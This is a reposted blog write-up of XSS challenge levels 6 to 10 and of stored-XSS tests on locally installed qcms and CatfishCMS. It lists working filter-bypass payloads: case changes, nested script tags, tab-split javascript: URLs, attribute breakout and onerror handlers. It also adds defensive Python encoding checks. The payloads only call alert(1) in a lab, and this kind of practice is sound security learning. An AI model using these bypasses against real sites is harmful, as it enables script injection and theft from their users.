XSS part 2

0x01 XSS challenge levels 6-10

1.1 level 6

Test with the typical payload (<script>alert(1)</script>) and notice that the word script has been altered in the response.

Change the case of script (e.g. sCript) and break out of the double-quoted attribute first, bingo:
http://n00p.me/xss/level6.php?keyword="><sCript>alert(1)</script> <" &submit

1.2 level 7

Test with the typical payload:

Changing the case (Script) did not work this time. Finally, nesting script inside itself (scrscriptipt, so that removing one occurrence of script still leaves script behind), together with breaking out of the double quote, did it, bingo:
http://n00p.me/xss/level7.php?keyword="><scrscriptipt>alert(1)</scrscriptipt><"&submit

1.3 level 8

try1: test with the typical payload and find two exploitable points (exp-points).

try2: break out of the quote
http://n00p.me/xss/level6.php?keyword=<script>alert(1)</script> &submit
Judging by the source, htmlspecialchars was probably used:

<input name=keyword  value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;&quot;     ">

try3: move to the next exp-point
http://n00p.me/xss/level8.php?keyword=javascript:alert(1) &submit
http://n00p.me/xss/level8.php?keyword=javaScript:alert(1) &submit
http://n00p.me/xss/level8.php?keyword=javas cript:alert(1) &submit (the blank is a tab character; if you type it in the address bar or HackBar the tab is stripped, as confirmed with Burp Suite)
Each result:

<a href="javascr_ipt:alert(1)     ">友情链接</a>
<a href="javascr_ipt:alert(1)     ">友情链接</a>
<a href="javascr_ipt:alert(1)     ">友情链接</a>

try4: type the tab in the input box instead, bingo (intercepting with Burp shows that a tab typed in the input box is URL-encoded, unlike in the address bar; so using %09 in the address bar gives a real tab just like the input box does).

1.4 level 9

try1: use the typical payload as before and find this:

<a href="您的链接不合法?有没有!">友情链接</a>

try2: try a valid-looking link, which works fine:
http://n00p.me/xss/level9.php?keyword=http://n00p.me&submit

<a href="http://n00p.me">友情链接</a>

try3: after a few tests, http:// turns out to be the core string that the payload must contain, otherwise the try1 message is returned. So we just include that string and proceed as in level 8, bingo:
http://n00p.me/xss/level9.php?keyword=javas%09cript:alert('http://') &submit
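As an added defensive counterpart to levels 8 and 9 (my own example, not code from the challenge or its author): a Python href check that normalises the value the way a browser does before scheme detection, removing tab and newline, so neither the "contains http://" rule nor the %09 trick gets through. `contains_http_check` is an assumption of the level 9 rule, inferred from the write-up; the probes are constructed from the payloads above.

```python
import html
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed probes modelled on the levels 8/9 write-up above (test data, not live traffic).
PROBES = [
    "http://n00p.me",                   # legitimate link
    "javascript:alert('http://')",      # level 9: contains http:// but is not a link
    "javas\tcript:alert('http://')",    # level 8/9: %09 tab hidden inside the scheme
]


def contains_http_check(keyword: str) -> bool:
    """Level 9 acceptance rule as inferred from the write-up (assumption): any 'http://' substring passes."""
    return "http://" in keyword


def safe_href(keyword: str):
    """Return an attribute-safe href, or None when the value is not an http(s) URL.

    Browsers drop ASCII tab/newline anywhere in a URL, and leading/trailing C0 controls
    and spaces, before reading the scheme. The check normalises the same way; otherwise
    'javas<TAB>cript:' looks like a non-scheme here but runs as javascript: in the browser.
    """
    cleaned = re.sub(r"[\t\n\r]", "", keyword)
    cleaned = cleaned.strip("".join(chr(c) for c in range(0x21)))
    try:
        parts = urlsplit(cleaned)  # urlsplit lowercases the scheme for us
    except ValueError:
        return None
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    # Encode for a double-quoted attribute so a quote inside the URL cannot close value="...".
    return html.escape(cleaned, quote=True)


def render_link(keyword: str) -> str:
    """Render the 友情链接 anchor; invalid values get no href attribute at all."""
    href = safe_href(keyword)
    if href is None:
        return "<a>invalid link</a>"
    return f'<a href="{href}">友情链接</a>'


def audit(probes=PROBES):
    """(probe, passes substring rule, passes scheme check) for each probe."""
    return [(p, contains_http_check(p), safe_href(p) is not None) for p in probes]
```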

1.5 level 10

try1: use the typical payload and find the exploit-like spot in Burp's response:

<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2>

try2: from try1, the predefined characters (less-than sign < and greater-than sign >) have been converted to HTML entities (&lt; and &gt;). Does that mean there is nothing to do here? Focus on the rest of the HTML and notice these:

<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
</form>

try3: there is a form with 3 input tags in it. The form method is not defined, so it defaults to GET. That means we can build the URL directly instead of editing HTML elements to probe the form's exp-points. Build a URL like this and check whether there is anything to exploit:
http://n00p.me/xss/level10.php?keyword=aaa&t_link=bbb&t_history=ccc&t_sort=ddd

try4: dada! After sending the URL above, we find an exploit-like spot in the response HTML, as below:

<form id="search">
<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="ddd" type="hidden">
</form>

try5: break out of the t_sort input, bingo:
http://n00p.me/xss/level10.php?keyword=aaa&t_link=bbb&t_history=ccc&t_sort=d" onclick=alert(1) type="text
Why does the input end up with type text instead of hidden? See the referenced link for the explanation:

What happens in practice is that the latter attribute is ignored

Note that this is the reverse of how duplicate CSS selectors behave.
Neither duplicate attributes nor duplicate CSS selectors are recommended in a production environment!
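Added example (mine, not from the challenge or its author) showing why a substring blacklist fails on levels 6 and 7 while htmlspecialchars-style output encoding holds, including the level 10 hidden-input reflection; it uses Python's html.escape in place of PHP's htmlspecialchars. The probes are constructed from the payloads above and the t_sort template is taken from the level 10 response.

```python
import html
import re

# Constructed probes taken from the levels 6, 7 and 10 write-up above (test data).
PROBES = [
    '"><sCript>alert(1)</script> <"',             # level 6: case change
    '"><scrscriptipt>alert(1)</scrscriptipt><"',  # level 7: nested token survives one strip pass
    'd" onclick=alert(1) type="text',             # level 10: attribute injection
]

TEMPLATE = '<input name="t_sort" value="{}" type="hidden">'


def blacklist_filter(value: str) -> str:
    """Single-pass, case-sensitive removal of 'script' (the kind of rule levels 6 and 7 defeat)."""
    return value.replace("script", "")


def render_blacklisted(value: str) -> str:
    """Reflect the value after the blacklist filter, without encoding."""
    return TEMPLATE.format(blacklist_filter(value))


def render_encoded(value: str) -> str:
    """Output encoding for a double-quoted attribute, equivalent to htmlspecialchars(..., ENT_QUOTES)."""
    return TEMPLATE.format(html.escape(value, quote=True))


def attribute_intact(markup: str) -> bool:
    """True when the rendered tag keeps the template's shape: one value attribute with no raw
    quote, '<' or '>' inside it, and nothing appended after it."""
    return re.fullmatch(r'<input name="t_sort" value="([^"<>]*)" type="hidden">', markup) is not None


def leaks(render, probes=PROBES):
    """Probes for which the renderer lets the input break out of the attribute."""
    return [p for p in probes if not attribute_intact(render(p))]
```

The blacklist renderer leaks on every probe (the level 7 string collapses back to script after one removal), while the encoded renderer leaks on none.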

0x02 qcms

2.1 switch the PHP version to 5.2
2.2 bind the site root to port 8080
2.3 type http://n00p.me:8080 in the address bar, enter the DB config info and install; once complete, find the message board (留言) page:

2.4 try the typical payload in the textbox, bingo!

0x03 CatfishCMS

3.1 switch the PHP version to 5.5
3.2 open http://n00p.me/catfish, install, register an account, log in and click a post; find the comment (留言) area as below:
3.3 submit the typical payload; the response suggests htmlspecialchars() was used in the PHP code:

<p><p>&lt;script&gt;alert(1)&lt;/script&gt;</p></p>

3.4 pull out Burp and look for the exp-point, find this:
pinglun=%3Cp%3E%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B%3C%2Fp%3E
Apparently it has been URL-encoded; decode it:
pinglun=<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
So the payload is HTML-encoded on the client before being sent to the server. What if we change it back to its raw form, like below?
pinglun=<p><script>alert(1)</script></p>
After forwarding the above, the comment was posted successfully but the content part was left empty. Guessing that the server filters the string script, use the payload below instead, bingo:
pinglun=<p><script>alert(1)</script></p>

3.5 alternative payloads

  • pinglun=<img src=x onerror=alert(1)>
  • pinglun=<p onmouseover=alert(12121212)>aa</p>

0x04 summary about CMS site deployment

  1. reading the documentation shipped with the CMS is essential; it has valuable info for deploying it correctly
  2. if the install-like page reports errors, try changing the PHP version
  3. some CMSs restrict the path to the www dir; phpstudy's sites_domain_control option can handle this
  4. deploying a CMS site is not difficult, it just needs some patience and it will work properly

Reposted from www.cnblogs.com/n00p/p/8988986.html